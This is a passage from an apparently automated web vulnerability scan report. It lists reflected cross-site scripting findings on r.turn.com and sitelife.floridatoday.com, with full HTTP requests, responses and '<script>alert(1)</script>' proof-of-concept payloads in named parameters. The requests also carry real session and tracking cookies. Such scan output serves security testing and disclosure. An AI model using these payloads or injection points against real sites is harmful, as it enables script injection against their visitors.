Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15097%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:10 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2795701947817126467&fpid=fab5a"><script>alert(1)</script>ac6ea673d6b&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
3.68. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e57"><script>alert(1)</script>47517675025 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=f8e57"><script>alert(1)</script>47517675025&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15097%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:12 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:11 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4450431897712270631&fpid=4&nu=n&t=&sp=f8e57"><script>alert(1)</script>47517675025&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
3.69. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpcb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload 476ae<script>alert(1)</script>8cce851e406 was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb476ae<script>alert(1)</script>8cce851e406&jpctx=request_0 HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:01:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=4ae39088-1ee3-4bbf-8702-891e1328eb05; domain=floridatoday.com; expires=Tue, 08-May-2012 14:01:16 GMT; path=/
Date: Mon, 09 May 2011 14:01:16 GMT
Content-Length: 3076

PluckSDKjpcb476ae<script>alert(1)</script>8cce851e406({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.floridatoday.A9105
...[SNIP]...
3.70. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload 81cf3<script>alert(1)</script>472e56e0cef was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_081cf3<script>alert(1)</script>472e56e0cef HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
